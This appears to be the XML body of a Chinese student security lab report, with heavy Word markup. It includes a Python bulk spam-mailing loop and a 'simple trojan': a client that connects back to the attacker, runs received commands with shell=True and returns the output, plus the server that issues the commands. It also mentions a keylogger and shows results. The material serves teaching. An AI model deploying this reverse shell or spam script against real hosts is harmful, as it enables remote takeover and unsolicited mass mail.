    </w:p>
    <w:p w14:paraId="0415363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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00C854F3">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>sleeptime</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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= int(input("输入邮件发送时间间隔(秒)："))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CCCE00D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b = 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ABC1BEE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while b == 1:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D883EB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    a = input("输入收件人邮箱：")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EDA0636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email_list.append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(a)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2D0D65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    b = int(input("继续请按1，退出请按0:"))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4467DC58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if b == 0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7CF129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    continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573C9FE3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for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i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in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email_list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:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BCEBA2E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to_addrs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i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="54C9541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for a in range(1, cs + 1):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AAB1CD1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time.sleep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sleeptime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)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217D5572" w14:textId="77777777" w:rsidR="00C854F3" w:rsidRPr="00C854F3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sendMail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(message, Subject,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sender_show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recipient_show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C854F3">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>to_addrs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00C854F3">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308C7700" w14:textId="63569E3C" w:rsidR="001812C9" w:rsidRDefault="00C854F3" w:rsidP="00C854F3">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/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854F3">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    print("批量发送完成")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D01450F" w14:textId="5BB00C3C" w:rsidR="00C525AB" w:rsidRPr="00C525AB" w:rsidRDefault="006A35CD" w:rsidP="00C525AB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</w:t>
      </w:r>
      <w:r w:rsidR="00C525AB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C525AB" w:rsidRPr="00C525AB">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>简易木马：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03DA891C" w14:textId="77777777" w:rsidR="00271303" w:rsidRDefault="00C525AB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实验内容：</w:t>
      </w:r>
      <w:r w:rsidR="00271303">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>编写程序对远程主机进行操控。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71CAB117" w14:textId="77777777" w:rsidR="00271303" w:rsidRDefault="00271303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A、 被攻击的主机反向连接攻击机；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07F8A8DC" w14:textId="77777777" w:rsidR="00271303" w:rsidRDefault="00271303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B、 可在被攻击的主机上执行命令（以命令行的形式，如</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>、ls、rm、del等）；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FB88796" w14:textId="13A8D612" w:rsidR="00C525AB" w:rsidRDefault="00271303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C、 将操作的结果显示到攻击机上。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F292A75" w14:textId="2E93CEE1" w:rsidR="00271303" w:rsidRDefault="00BA270F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客户端：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52EC6A2B" w14:textId="77777777" w:rsidR="00BA270F" w:rsidRPr="003C1FE8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# 客户端，执行命令，获得结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52B1D6C0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 xml:space="preserve">import </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BA270F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>shlex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0B886982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>import subprocess</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CCFD7CA" w14:textId="2B6AB7E1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>from socket import socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C963BA6" w14:textId="77777777" w:rsidR="00BA270F" w:rsidRPr="00BA270F" w:rsidRDefault="00BA270F" w:rsidP="00BA270F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="left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def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run_command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(com: str):  # 执行命令com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3DDA90" w14:textId="7CA634AB" w:rsidR="00BA270F" w:rsidRPr="00BA270F" w:rsidRDefault="00BA270F" w:rsidP="00BA270F">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:jc w:val="left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 xml:space="preserve">    return</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BA270F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>subprocess.run</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BA270F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BA270F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>shlex.split</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BA270F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BA270F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>com.decode</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BA270F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">('utf-8')), shell=True, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BA270F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>stdout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BA270F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BA270F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>subprocess.PIPE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BA270F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>, stderr=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BA270F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>subprocess.PIPE</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BA270F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F6C252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># run方法执行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cmd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命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62898EF1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#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shlex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可以将命令和参数分割开，变成一个列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523D9482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>serv = socket()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3748B001" w14:textId="76DA6561" w:rsidR="00BA270F" w:rsidRPr="00BA270F" w:rsidRDefault="00BA270F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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BA270F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>serv.connect</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BA270F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(('localhost', 9999))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A94E1D0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>while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CA7E565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    command =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serv.recv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(1024)  # 接收命令,得到字节数组</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10181ED9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   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command.decode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('utf-8')  # 转换成字符串，传入com</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0864256E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    if not command:  # command不为空</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04FCA217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        print("请重新输入：")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE2F783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t xml:space="preserve">        continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="203E4E68" w14:textId="77777777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/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">    result = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BA270F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>run_command</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BA270F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(command)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1E86C9" w14:textId="2D799D88" w:rsidR="00BA270F" w:rsidRPr="00BA270F" w:rsidRDefault="00BA270F" w:rsidP="00BA270F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BA270F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">   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serv.send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("【*】命令执行成功【*】\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n".encode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('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gbk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 xml:space="preserve">') + </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BA270F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>result.stdout</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BA270F">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>)  # 执行成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73DB629B" w14:textId="42F3A146" w:rsidR="00BA270F" w:rsidRDefault="00BA270F" w:rsidP="0027130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服务端：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768933CE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# 服务端,监听，发送命令，等待结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671F17E0" w14:textId="38DB39C3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>from socket import socket</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EE3EA42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print("等待连接...")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="789E9F72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>serv = socket()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7857BE77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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C1FE8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>serv.bind</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C1FE8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(('localhost', 9999))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5932C45B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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C1FE8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>serv.listen</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C1FE8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>(5)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA3AAE8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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C1FE8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>tcp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 xml:space="preserve">, _ = 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serv.accept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()  # 放在循环外面可实现客户端执行命令并发挥结果后</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="003C1FE8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>不</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="003C1FE8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>自动退出</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20E04393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print('已连接！')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="568D2835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print("输入“exit”退出连接")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="004C4FE0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>while True:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AA0F6F5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 xml:space="preserve">    </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C1FE8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C1FE8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> = input('&gt; ')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2EB96B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 xml:space="preserve">    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tcp.send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(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cmd.encode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('utf-8'))   # 下达命令</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078C30BB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 xml:space="preserve">    if </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C1FE8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>cmd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C1FE8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> == "exit":</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28362B96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 xml:space="preserve">        print("断开连接")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4132CF11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/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="553E9425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 xml:space="preserve">    data = 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tcp.recv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(1024)   # 接收客户端的命令执行结果</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC62888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 xml:space="preserve">    print(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data.decode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('</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C1FE8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>gbk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C1FE8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>'))   # data是字节数组</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390DC21F" w14:textId="77777777" w:rsidR="003C1FE8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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003C1FE8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>serv.close</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003C1FE8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="177EC297" w14:textId="5FDCFB7F" w:rsidR="00BA270F" w:rsidRPr="003C1FE8" w:rsidRDefault="003C1FE8" w:rsidP="003C1FE8">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体"/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003C1FE8">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:bCs/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>print("已退出！")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B78282" w14:textId="1CFB8401" w:rsidR="00D429B8" w:rsidRPr="009C0654" w:rsidRDefault="00054118" w:rsidP="009C0654">
      <w:pPr>
        <w:pStyle w:val="a6"/>
        <w:widowControl/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2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实验结果分析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453DB2D2" w14:textId="44E863AF" w:rsidR="00C854F3" w:rsidRDefault="009C0654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</w:t>
      </w:r>
      <w:r w:rsidR="00C854F3">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00C854F3" w:rsidRPr="00F32E2A">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>键盘记录</w:t>
      </w:r>
      <w:r w:rsidR="00C854F3">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DF429C" w14:textId="553D85CC" w:rsidR="00D429B8" w:rsidRDefault="00D429B8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键盘输入1，2，3，回车键，a，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>s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14:paraId="2BED40C3" w14:textId="0AD1874B" w:rsidR="00C854F3" w:rsidRDefault="00D429B8" w:rsidP="00C854F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1970C8">
        <w:rPr>
          <w:rFonts w:eastAsia="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DE3EC8B" wp14:editId="2C6AA20A">
            <wp:extent cx="5017416" cy="691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128" cy="7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AB0" w14:textId="300CAC7B" w:rsidR="00D429B8" w:rsidRPr="00F32E2A" w:rsidRDefault="00D429B8" w:rsidP="00C274DA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1970C8">
        <w:rPr>
          <w:rFonts w:eastAsia="黑体"/>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D2F2691" wp14:editId="652029A0">
            <wp:extent cx="4049941" cy="5474677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6"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4125735" cy="55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5E62" w14:textId="2D147F5E" w:rsidR="00C854F3" w:rsidRPr="00053024" w:rsidRDefault="00053024" w:rsidP="00053024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</w:t>
      </w:r>
      <w:r w:rsidR="00C854F3" w:rsidRPr="00053024">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>发送垃圾邮件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AA4CDD0" w14:textId="2B7C183D" w:rsidR="00053024" w:rsidRPr="00053024" w:rsidRDefault="00053024" w:rsidP="00053024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批量发送垃圾邮件：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="286B814B" w14:textId="72483C47" w:rsidR="00D429B8" w:rsidRDefault="00D429B8" w:rsidP="00D429B8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Pr="00D429B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B893F82" wp14:editId="6DCC2D06">
            <wp:extent cx="4882661" cy="2522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91"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4903311" cy="253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A863" w14:textId="4B2BD95F" w:rsidR="00D429B8" w:rsidRDefault="00D429B8" w:rsidP="00D429B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收到的垃圾邮件：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54013F40" w14:textId="26C89C2D" w:rsidR="00053024" w:rsidRDefault="00D429B8" w:rsidP="00053024">
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:noProof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323EAC89" wp14:editId="105BAD73">
            <wp:extent cx="3259015" cy="243003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" b="64856"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3279748" cy="24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70C8" w:rsidRPr="001970C8">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="791C2F34" w14:textId="4B857DBC" w:rsidR="00AB0407" w:rsidRDefault="00AB0407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3.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AB0407">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>简易木马</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BD36AD0" w14:textId="28CA5FFF" w:rsidR="00AB0407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运行服务端与客户端：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76D19472" w14:textId="54C81821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5AFAD659" wp14:editId="0AD725E0">
            <wp:extent cx="4454750" cy="990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802" cy="10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48A" w14:textId="6425410A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输入</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorEastAsia" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="majorEastAsia" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>命令：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="043D0EC1" w14:textId="7AD4C7D5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5A2B9AF" wp14:editId="4D0A1FB9">
